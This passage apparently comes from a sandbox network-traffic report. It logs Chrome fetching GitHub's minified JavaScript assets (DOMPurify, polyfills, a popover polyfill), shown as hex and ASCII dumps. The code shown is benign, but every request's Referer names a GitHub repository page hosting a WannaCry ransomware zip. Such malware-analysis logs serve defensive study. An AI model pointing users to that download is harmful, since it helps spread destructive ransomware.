                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 21 3d 3d 65 28 74 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 72 3d 6e 75 6c 6c 2c 6f 3d 22 64 61 74 61 2d 74 74 2d 70 6f 6c 69 63 79 2d 73 75 66 66 69 78 22 3b 6e 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 6e 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 6f 29 26 26 28 72 3d 6e 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6f 29 29 3b 76 61 72 20 61 3d 22 64 6f 6d 70 75 72 69 66 79 22 2b 28 72 3f 22 23 22 2b 72 3a 22 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 74 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 61 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 66 75 6e 63 74
                                                                                      Data Ascii: "!==e(t)||"function"!=typeof t.createPolicy)return null;var r=null,o="data-tt-policy-suffix";n.currentScript&&n.currentScript.hasAttribute(o)&&(r=n.currentScript.getAttribute(o));var a="dompurify"+(r?"#"+r:"");try{return t.createPolicy(a,{createHTML:funct
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 72 20 65 67 3d 56 2c 65 62 3d 6e 75 6c 6c 2c 65 76 3d 43 28 7b 7d 2c 5b 5d 2e 63 6f 6e 63 61 74 28 72 28 4c 29 2c 72 28 4d 29 2c 72 28 49 29 2c 72 28 46 29 2c 72 28 48 29 29 29 2c 65 54 3d 6e 75 6c 6c 2c 65 4e 3d 43 28 7b 7d 2c 5b 5d 2e 63 6f 6e 63 61 74 28 72 28 6a 29 2c 72 28 50 29 2c 72 28 42 29 2c 72 28 47 29 29 29 2c 65 41 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 2c 7b 74 61 67 4e 61 6d 65 43 68 65 63 6b 3a 7b 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 6e 75 6c 6c 7d 2c 61 74 74 72 69 62 75 74 65 4e 61 6d 65 43 68 65 63 6b 3a 7b 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65
                                                                                      Data Ascii: r eg=V,eb=null,ev=C({},[].concat(r(L),r(M),r(I),r(F),r(H))),eT=null,eN=C({},[].concat(r(j),r(P),r(B),r(G))),eA=Object.seal(Object.create(null,{tagNameCheck:{writable:!0,configurable:!1,enumerable:!0,value:null},attributeNameCheck:{writable:!0,configurable


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.1649716185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC736OUTGET /assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 14106
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 24 Oct 2023 17:57:36 GMT
                                                                                      ETag: 0x8DBD4BAB47FA2C9
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:21 GMT
                                                                                      Age: 2074606
                                                                                      X-Served-By: cache-iad-kiad7000136-IAD, cache-ewr18168-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2487, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 689d70e41410488038852e1379d83bacf0484b15
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 22 5d 2c 7b 32 38 33 38 32 3a 28 74 2c 65 2c 72 29 3d 3e 7b 72 2e 64 28 65 2c 7b 51 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 6e 3d 22 3c 75 6e 6b 6e 6f 77 6e 3e 22 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 73 70
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183"],{28382:(t,e,r)=>{r.d(e,{Q:()=>o});var n="<unknown>";function o(t){return t.sp
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 28 3f 3a 3a 28 5c 64 2b 29 29 5c 29 2f 2c 61 3d 2f 5e 5c 73 2a 61 74 20 28 3f 3a 28 28 3f 3a 5c 5b 6f 62 6a 65 63 74 20 6f 62 6a 65 63 74 5c 5d 29 3f 2e 2b 29 20 29 3f 5c 28 3f 28 28 3f 3a 66 69 6c 65 7c 6d 73 2d 61 70 70 78 7c 68 74 74 70 73 3f 7c 77 65 62 70 61 63 6b 7c 62 6c 6f 62 29 3a 2e 2a 3f 29 3a 28 5c 64 2b 29 28 3f 3a 3a 28 5c 64 2b 29 29 3f 5c 29 3f 5c 73 2a 24 2f 69 2c 75 3d 2f 5e 5c 73 2a 28 2e 2a 3f 29 28 3f 3a 5c 28 28 2e 2a 3f 29 5c 29 29 3f 28 3f 3a 5e 7c 40 29 28 28 3f 3a 66 69 6c 65 7c 68 74 74 70 73 3f 7c 62 6c 6f 62 7c 63 68 72 6f 6d 65 7c 77 65 62 70 61 63 6b 7c 72 65 73 6f 75 72 63 65 7c 5c 5b 6e 61 74 69 76 65 29 2e 2a 3f 7c 5b 5e 40 5d 2a 62 75 6e 64 6c 65 29 28 3f 3a 3a 28 5c 64 2b 29 29 3f 28 3f 3a 3a 28 5c 64 2b 29 29 3f 5c 73
                                                                                      Data Ascii: (?::(\d+))\)/,a=/^\s*at (?:((?:\[object object\])?.+) )?\(?((?:file|ms-appx|https?|webpack|blob):.*?):(\d+)(?::(\d+))?\)?\s*$/i,u=/^\s*(.*?)(?:\((.*?)\))?(?:^|@)((?:file|https?|blob|chrome|webpack|resource|\[native).*?|[^@]*bundle)(?::(\d+))?(?::(\d+))?\s
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 2c 69 73 50 6f 6c 79 66 69 6c 6c 65 64 3a 28 29 3d 3e 44 2c 69 73 53 75 70 70 6f 72 74 65 64 3a 28 29 3d 3e 4c 7d 29 3b 76 61 72 20 61 3d 7b 7d 3b 72 2e 72 28 61 29 2c 72 2e 64 28 61 2c 7b 43 6c 69 70 62 6f 61 72 64 49 74 65 6d 3a 28 29 3d 3e 63 6c 69 70 62 6f 61 72 64 69 74 65 6d 5f 43 6c 69 70 62 6f 61 72 64 49 74 65 6d 2c 61 70 70 6c 79 3a 28 29 3d 3e 71 2c 69 73 50 6f 6c 79 66 69 6c 6c 65 64 3a 28 29 3d 3e 4e 2c 69 73 53 75 70 70 6f 72 74 65 64 3a 28 29 3d 3e 5f 7d 29 3b 76 61 72 20 75 3d 7b 7d 3b 72 2e 72 28 75 29 2c 72 2e 64 28 75 2c 7b 61 70 70 6c 79 3a 28 29 3d 3e 7a 2c 69 73 50 6f 6c 79 66 69 6c 6c 65 64 3a 28 29 3d 3e 57 2c 69 73 53 75 70 70 6f 72 74 65 64 3a 28 29 3d 3e 48 2c 72 65 70 6c 61 63 65 43 68 69 6c 64 72 65 6e 3a 28 29 3d 3e 24 7d 29
                                                                                      Data Ascii: ,isPolyfilled:()=>D,isSupported:()=>L});var a={};r.r(a),r.d(a,{ClipboardItem:()=>clipboarditem_ClipboardItem,apply:()=>q,isPolyfilled:()=>N,isSupported:()=>_});var u={};r.r(u),r.d(u,{apply:()=>z,isPolyfilled:()=>W,isSupported:()=>H,replaceChildren:()=>$})
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 6e 20 41 62 6f 72 74 53 69 67 6e 61 6c 2e 61 62 6f 72 74 3d 3d 3d 76 7d 66 75 6e 63 74 69 6f 6e 20 41 28 29 7b 78 28 29 7c 7c 28 41 62 6f 72 74 53 69 67 6e 61 6c 2e 61 62 6f 72 74 3d 76 29 7d 66 75 6e 63 74 69 6f 6e 20 77 28 74 29 7b 6c 65 74 20 65 3d 6e 65 77 20 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 3b 72 65 74 75 72 6e 20 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 65 2e 61 62 6f 72 74 28 6e 65 77 20 44 4f 4d 45 78 63 65 70 74 69 6f 6e 28 22 54 69 6d 65 6f 75 74 45 72 72 6f 72 22 29 29 2c 74 29 2c 65 2e 73 69 67 6e 61 6c 7d 66 75 6e 63 74 69 6f 6e 20 45 28 29 7b 72 65 74 75 72 6e 22 61 62 6f 72 74 22 69 6e 20 41 62 6f 72 74 53 69 67 6e 61 6c 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 41 62 6f 72 74 53 69 67 6e 61 6c 2e 74 69
                                                                                      Data Ascii: n AbortSignal.abort===v}function A(){x()||(AbortSignal.abort=v)}function w(t){let e=new AbortController;return setTimeout(()=>e.abort(new DOMException("TimeoutError")),t),e.signal}function E(){return"abort"in AbortSignal&&"function"==typeof AbortSignal.ti
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 29 29 7b 6c 65 74 20 74 3d 7b 76 61 6c 75 65 3a 6b 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2c 22 61 74 22 2c 74 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2c 22 61 74 22 2c 74 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 49 2c 22 61 74 22 2c 74 29 7d 7d 6c 65 74 20 46 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 55 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 6c 65 74 20 63 6c 69 70 62 6f 61 72 64 69 74 65 6d 5f 43 6c 69 70 62 6f 61 72 64 49 74 65 6d 3d 63 6c 61 73 73 20 63 6c 69 70 62 6f 61 72 64 69 74 65
                                                                                      Data Ascii: )){let t={value:k,writable:!0,configurable:!0};Object.defineProperty(Array.prototype,"at",t),Object.defineProperty(String.prototype,"at",t),Object.defineProperty(I,"at",t)}}let F=new WeakMap,U=new WeakMap;let clipboarditem_ClipboardItem=class clipboardite
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 67 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 72 65 6e 7d 66 75 6e 63 74 69 6f 6e 20 57 28 29 7b 72 65 74 75 72 6e 20 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 72 65 6e 3d 3d 3d 24 26 26 44 6f 63 75 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 72 65 6e 3d 3d 3d 24 26 26 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 72 65 6e 3d 3d 3d 24 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 29 7b 48 28 29 7c 7c 28 45 6c 65 6d 65 6e 74 2e 70 72 6f
                                                                                      Data Ascii: gment.prototype&&"function"==typeof DocumentFragment.prototype.replaceChildren}function W(){return Element.prototype.replaceChildren===$&&Document.prototype.replaceChildren===$&&DocumentFragment.prototype.replaceChildren===$}function z(){H()||(Element.pro
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 67 61 74 6f 72 2e 63 6c 69 70 62 6f 61 72 64 2e 77 72 69 74 65 7d 66 75 6e 63 74 69 6f 6e 20 59 28 29 7b 72 65 74 75 72 6e 22 63 6c 69 70 62 6f 61 72 64 22 69 6e 20 6e 61 76 69 67 61 74 6f 72 26 26 28 6e 61 76 69 67 61 74 6f 72 2e 63 6c 69 70 62 6f 61 72 64 2e 77 72 69 74 65 3d 3d 3d 5a 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 63 6c 69 70 62 6f 61 72 64 2e 72 65 61 64 3d 3d 3d 4b 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 29 7b 22 63 6c 69 70 62 6f 61 72 64 22 69 6e 20 6e 61 76 69 67 61 74 6f 72 26 26 21 58 28 29 26 26 28 6e 61 76 69 67 61 74 6f 72 2e 63 6c 69 70 62 6f 61 72 64 2e 77 72 69 74 65 3d 5a 2c 6e 61 76 69 67 61 74 6f 72 2e 63 6c 69 70 62 6f 61 72 64 2e 72 65 61 64 3d 4b 29 7d 66 75 6e 63 74 69 6f 6e 20 74 65 28 74 3d 6e 75 6c 6c 29 7b 6c 65 74 20 65
                                                                                      Data Ascii: gator.clipboard.write}function Y(){return"clipboard"in navigator&&(navigator.clipboard.write===Z||navigator.clipboard.read===K)}function tt(){"clipboard"in navigator&&!X()&&(navigator.clipboard.write=Z,navigator.clipboard.read=K)}function te(t=null){let e
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 20 74 66 28 29 7b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 3d 3d 3d 74 63 7d 66 75 6e 63 74 69 6f 6e 20 74 64 28 29 7b 74 73 28 29 7c 7c 28 50 72 6f 6d 69 73 65 2e 61 6c 6c 53 65 74 74 6c 65 64 3d 74 63 29 7d 66 75 6e 63 74 69 6f 6e 20 74 79 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 65 2c 72 29 3d 3e 7b 6c 65 74 20 6e 3d 21 31 2c 6f 3d 41 72 72 61 79 2e 66 72 6f 6d 28 74 29 2c 69 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 74 29 7b 6e 7c 7c 28 6e 3d 21 30 2c 65 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 69 2e 70 75 73 68 28 74 29 2c 69 2e 6c 65 6e 67 74 68 3d 3d 3d 6f 2e 6c 65 6e 67 74 68 26 26 72 28 6e 65 77 20 67 6c 6f 62 61 6c 54 68 69 73 2e 41 67 67 72 65 67 61 74 65 45 72 72 6f 72 28 69 2c 22
                                                                                      Data Ascii: tf(){return Promise.all===tc}function td(){ts()||(Promise.allSettled=tc)}function ty(t){return new Promise((e,r)=>{let n=!1,o=Array.from(t),i=[];function l(t){n||(n=!0,e(t))}function a(t){i.push(t),i.length===o.length&&r(new globalThis.AggregateError(i,"
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 61 63 65 41 6c 6c 3d 3d 3d 74 77 7d 66 75 6e 63 74 69 6f 6e 20 74 43 28 29 7b 74 45 28 29 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 70 6c 61 63 65 41 6c 6c 3d 74 77 29 7d 66 75 6e 63 74 69 6f 6e 20 74 54 28 74 2c 65 3d 74 68 69 73 29 7b 66 6f 72 28 6c 65 74 20 72 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2d 31 3b 72 3e 3d 30 3b 72 2d 3d 31 29 69 66 28 74 2e 63 61 6c 6c 28 65 2c 74 68 69 73 5b 72 5d 2c 72 2c 74 68 69 73 29 29 72 65 74 75 72 6e 20 74 68 69 73 5b 72 5d 7d 66 75 6e 63 74 69 6f 6e 20 74 4f 28 29 7b 72 65 74 75 72 6e 22 66 69 6e 64 4c 61 73 74 22 69 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 64 4c 61
                                                                                      Data Ascii: aceAll===tw}function tC(){tE()||(String.prototype.replaceAll=tw)}function tT(t,e=this){for(let r=this.length-1;r>=0;r-=1)if(t.call(e,this[r],r,this))return this[r]}function tO(){return"findLast"in Array.prototype&&"function"==typeof Array.prototype.findLa
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 45 6e 74 72 69 65 73 22 69 6e 20 4f 62 6a 65 63 74 26 26 22 66 6c 61 74 4d 61 70 22 69 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 26 26 22 74 72 69 6d 45 6e 64 22 69 6e 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 26 26 22 6d 61 74 63 68 41 6c 6c 22 69 6e 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2c 74 55 3d 7b 61 62 6f 72 74 53 69 67 6e 61 6c 41 62 6f 72 74 3a 6e 2c 61 62 6f 72 74 53 69 67 6e 61 6c 54 69 6d 65 6f 75 74 3a 6f 2c 61 67 67 72 65 67 61 74 65 45 72 72 6f 72 3a 69 2c 61 72 72 61 79 41 74 3a 6c 2c 63 6c 69 70 62 6f 61 72 64 49 74 65 6d 3a 61 2c 63 72 79 70 74 6f 52 61 6e 64 6f 6d 55 55 49 44 3a 52 2c 65 6c 65 6d 65 6e 74 52 65 70 6c 61 63 65 43 68 69 6c 64 72 65 6e 3a 75 2c 65 76 65 6e 74 41 62 6f 72 74 53 69 67 6e 61 6c
                                                                                      Data Ascii: Entries"in Object&&"flatMap"in Array.prototype&&"trimEnd"in String.prototype&&"matchAll"in String.prototype,tU={abortSignalAbort:n,abortSignalTimeout:o,aggregateError:i,arrayAt:l,clipboardItem:a,cryptoRandomUUID:R,elementReplaceChildren:u,eventAbortSignal


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.1649717185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:21 UTC697OUTGET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-7bd350d761f4.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 9497
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 12 Mar 2024 18:24:27 GMT
                                                                                      ETag: 0x8DC42C1A6EBE6E7
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 421477
                                                                                      X-Served-By: cache-iad-kiad7000125-IAD, cache-ewr18133-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 32, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 9b7e4f931ba85e36657fdee4369c672cf4d4fce1
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6f 64 64 62 69 72 64 5f 70 6f 70 6f 76 65 72 2d 70 6f 6c 79 66 69 6c 6c 5f 64 69 73 74 5f 70 6f 70 6f 76 65 72 5f 6a 73 22 5d 2c 7b 31 33 36 30 34 3a 28 29 3d 3e 7b 76 61 72 20 65 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 76 65 6e 74 7b 6f 6c 64 53 74 61 74 65 3b 6e 65 77 53 74 61 74 65 3b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 7b 6f 6c 64 53 74 61 74 65 3a 74 3d 22 22 2c 6e 65 77 53 74 61 74 65 3a 6f 3d 22 22 2c 2e 2e 2e 6e 7d 3d 7b 7d 29 7b 73 75 70 65 72 28 65
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_oddbird_popover-polyfill_dist_popover_js"],{13604:()=>{var e=class extends Event{oldState;newState;constructor(e,{oldState:t="",newState:o="",...n}={}){super(e
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 28 21 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 65 28 22 62 65 66 6f 72 65 74 6f 67 67 6c 65 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 2c 6f 6c 64 53 74 61 74 65 3a 22 63 6c 6f 73 65 64 22 2c 6e 65 77 53 74 61 74 65 3a 22 6f 70 65 6e 22 7d 29 29 7c 7c 21 73 28 74 2c 21 31 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 70 3d 21 31 3b 69 66 28 22 61 75 74 6f 22 3d 3d 3d 74 2e 70 6f 70 6f 76 65 72 29 7b 6c 65 74 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 70 6f 70 6f 76 65 72 22 29 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 6e 65 77 20 4d 61 70 2c 6f 3d 30 2c 6e 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 6c 2e 67 65 74 28 6e 29 7c 7c 5b 5d 29 74 2e 73 65 74 28 65
                                                                                      Data Ascii: (!t.dispatchEvent(new e("beforetoggle",{cancelable:!0,oldState:"closed",newState:"open"}))||!s(t,!1))return;let p=!1;if("auto"===t.popover){let e=t.getAttribute("popover"),o=function(e){let t=new Map,o=0,n=e.ownerDocument;for(let e of l.get(n)||[])t.set(e
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 26 22 68 69 64 64 65 6e 22 3d 3d 3d 6c 2e 74 79 70 65 7c 7c 6c 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 41 6e 63 68 6f 72 45 6c 65 6d 65 6e 74 26 26 22 22 3d 3d 3d 6c 2e 68 72 65 66 29 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 6c 2e 74 61 62 49 6e 64 65 78 26 26 2d 31 21 3d 3d 6c 2e 74 61 62 49 6e 64 65 78 29 72 65 74 75 72 6e 20 69 3b 69 3d 72 2e 6e 65 78 74 4e 6f 64 65 28 29 7d 7d 29 28 74 29 3f 2e 66 6f 63 75 73 28 29 2c 22 61 75 74 6f 22 3d 3d 3d 74 2e 70 6f 70 6f 76 65 72 26 26 28 6c 2e 68 61 73 28 72 29 7c 7c 6c 2e 73 65 74 28 72 2c 6e 65 77 20 53 65 74 29 2c 6c 2e 67 65 74 28 72 29 2e 61 64 64 28 74 29 2c 53 28 75 2e 67 65 74 28 74 29 2c 21 30 29 29 2c 70 26 26 63 26 26 22 61 75 74 6f 22 3d 3d 3d 74 2e 70 6f 70 6f 76 65 72 26
                                                                                      Data Ascii: &"hidden"===l.type||l instanceof HTMLAnchorElement&&""===l.href)&&"number"==typeof l.tabIndex&&-1!==l.tabIndex)return i;i=r.nextNode()}})(t)?.focus(),"auto"===t.popover&&(l.has(r)||l.set(r,new Set),l.get(r).add(t),S(u.get(t),!0)),p&&c&&"auto"===t.popover&
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 28 6f 2c 69 29 3b 65 6c 73 65 20 69 66 28 22 70 6f 69 6e 74 65 72 75 70 22 3d 3d 3d 65 2e 74 79 70 65 29 7b 6c 65 74 20 65 3d 45 2e 67 65 74 28 6f 29 3d 3d 3d 69 3b 45 2e 64 65 6c 65 74 65 28 6f 29 2c 65 26 26 62 28 69 7c 7c 6f 2c 21 31 2c 21 30 29 7d 7d 76 61 72 20 54 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 66 75 6e 63 74 69 6f 6e 20 53 28 65 2c 74 3d 21 31 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 54 2e 68 61 73 28 65 29 7c 7c 54 2e 73 65 74 28 65 2c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 29 29 3b 6c 65 74 20 6f 3d 65 2e 70 6f 70 6f 76 65 72 54 61 72 67 65 74 45 6c 65 6d 65 6e 74 3b 69 66 28 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 22 61 75 74 6f 22 3d 3d 3d 6f 2e
                                                                                      Data Ascii: (o,i);else if("pointerup"===e.type){let e=E.get(o)===i;E.delete(o),e&&b(i||o,!1,!0)}}var T=new WeakMap;function S(e,t=!1){if(!e)return;T.has(e)||T.set(e,e.getAttribute("aria-expanded"));let o=e.popoverTargetElement;if(o instanceof HTMLElement&&"auto"===o.
